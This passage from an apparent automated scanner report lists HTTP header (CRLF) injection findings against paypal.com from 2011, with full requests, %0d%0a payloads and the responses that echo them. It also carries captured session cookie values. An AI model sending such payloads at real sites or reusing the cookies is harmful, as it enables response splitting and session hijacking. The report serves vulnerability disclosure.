pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:57 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/da179
1b0aed1234e/marketing/marketing.css
Content-Length: 302
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.10. https://www.paypal.com/WEBSCR-640-20110722-1/css/marketing/marketing.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/marketing/marketing.css

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload cc226%0d%0ad30d8473248 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/css/cc226%0d%0ad30d8473248/marketing.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:00 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/cc226
d30d8473248/marketing.css
Content-Length: 296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.11. https://www.paypal.com/WEBSCR-640-20110722-1/css/pages/pageSearchRedesign.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/pages/pageSearchRedesign.css

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 245ed%0d%0af59e75562a9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /245ed%0d%0af59e75562a9/css/pages/pageSearchRedesign.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:53 GMT
Server: Apache
Location: https://www.paypalobjects.com/245ed
f59e75562a9/css/pages/pageSearchRedesign.css
Content-Length: 289
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.12. https://www.paypal.com/WEBSCR-640-20110722-1/css/pages/pageSearchRedesign.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/pages/pageSearchRedesign.css

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fa3e4%0d%0af31551258ca was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/fa3e4%0d%0af31551258ca/pages/pageSearchRedesign.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:56 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/fa3e4
f31551258ca/pages/pageSearchRedesign.css
Content-Length: 307
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.13. https://www.paypal.com/WEBSCR-640-20110722-1/css/pages/pageSearchRedesign.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/css/pages/pageSearchRedesign.css

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5afe9%0d%0a8ce796d8961 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/css/5afe9%0d%0a8ce796d8961/pageSearchRedesign.css HTTP/1.1
Accept: text/css
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:00 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/5afe9
8ce796d8961/pageSearchRedesign.css
Content-Length: 305
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.14. https://www.paypal.com/WEBSCR-640-20110722-1/js/lib/min/global.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/lib/min/global.js

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload dfe8f%0d%0a8f88ab1f21 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dfe8f%0d%0a8f88ab1f21/js/lib/min/global.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:55 GMT
Server: Apache
Location: https://www.paypalobjects.com/dfe8f
8f88ab1f21/js/lib/min/global.js
Content-Length: 276
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.15. https://www.paypal.com/WEBSCR-640-20110722-1/js/lib/min/global.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/lib/min/global.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload d55a6%0d%0a3bb9932249d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/d55a6%0d%0a3bb9932249d/lib/min/global.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:41:58 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/d55a6
3bb9932249d/lib/min/global.js
Content-Length: 296
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.16. https://www.paypal.com/WEBSCR-640-20110722-1/js/lib/min/global.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/lib/min/global.js

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 86f6e%0d%0ac2f86c03ed1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/js/86f6e%0d%0ac2f86c03ed1/min/global.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=1TXdfYncNPc3OcD3Vsp-sRufuL3kUsQnhEsK-BH5G3gLLDL8WGcZPKWGrDD6_6l8I1pt6X-fwoKmBt7vIY6NL2TJZdpgPlQVHwZ5pVay3LVd9zvWkFFJoMJWStPARnvQ-YGZxW%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156416; navcmd=_account-authenticate-login; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=rkknIxowhDJJRVrakrbrUE1pUOu7kJzzA_4bPaOG0nlYjAwdoYy4a1hPMYvE-pZNF13eAdV2ig7kqd3_wUXFa_XGTQzQVftIXYb3RRgw3C3jdCTMSMf7vo-vIS7x70bDKinfjBxvk37xjDOQ28D8E7rg7bzc68YfPppB-QGUq02WEOcgmj1yFoamLtz6MEvGXprCv2fN5SwWBRffW3RibIetvQhosY5xsnvdAqmB9yswGpmaqk7c1rZjfAffjbs-UA23j2oRoyGtuXPPWoxcD0SujLxjLbwX225-eJ1NTrH0_X9lNc0T0twK0uTTfE7ieTFk8v8MtoHfMfBgPSUUd1jgyL8FWh2VldtR78-QovPoSs9hxaAc0DID5UxpxDo8eVJ5_I-Jp_YDrmM7UDLG6ESd-FDo9NqFFsZXw6MpH1WD5zO4lM1ZuqzodJAZNekNa3jiz_efcS78DaCNdMFx6kHDkw1KnlfGyUGcFl-sNkRc9Qe9NwJn8hCDP7e; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 12 Aug 2011 14:42:02 GMT
Server: Apache
Location: https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/86f6e
c2f86c03ed1/min/global.js
Content-Length: 295
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://www.paypalobjec
...[SNIP]...

1.17. https://www.paypal.com/WEBSCR-640-20110722-1/js/lib/min/global.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/WEBSCR-640-20110722-1/js/lib/min/global.js

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 2bb9c%0d%0a28403a88997 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /WEBSCR-640-20110722-1/js/lib/2bb9c%0d%0a28403a88997/global.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
